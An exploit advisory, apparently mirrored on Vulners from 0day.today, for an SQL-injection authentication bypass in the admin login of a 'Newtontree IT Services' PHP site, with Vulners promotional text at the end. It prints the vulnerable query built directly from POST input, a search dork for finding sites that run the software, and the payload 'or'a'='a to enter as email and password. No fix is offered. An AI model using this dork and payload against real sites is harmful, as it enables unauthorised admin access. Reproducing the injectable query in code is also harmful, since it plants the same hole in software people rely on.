Lucene search
K

Newtontree IT Services - Authentication Bypass Vulnerability

🗓️ 31 Jan 2014 00:00:00Reported by AtT4CKxT3rR0r1STType 
zdt
 zdt
🔗 0day.today👁 20 Views

Newtontree IT Services Authentication Bypass Vulnerabilit

Code
Newtontree IT Services  - Authentication Bypass Vulnerability
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST 
.:. Contact        : [[email protected]] , [[email protected]]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://newtontree.com/
.:. Dork           : "Powered by Newtontree IT Services Pvt Ltd"
####################################################################

VULNERABILITY
##############
/admin/index.php (line 40-47)

  if(isset($_POST['login'])){   
        $email=$_POST['email'];
        $pwd=$_POST['pwd'];   
        $sql="select * from login where  email='$email' and  pwd='$pwd'";
        $sql2=mysql_query($sql);
        $no=mysql_num_rows($sql2);
        if($no > 0){
            if($rec=mysql_fetch_row($sql2))
#########
EXPLOIT
#########

1- Go to admin [www.site.com/admin/]
2- join code Auth Bypass in Email & Password
3- Email: 'or'a'='a
Password: 'or'a'='a
####################################################################

#  0day.today [2018-02-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation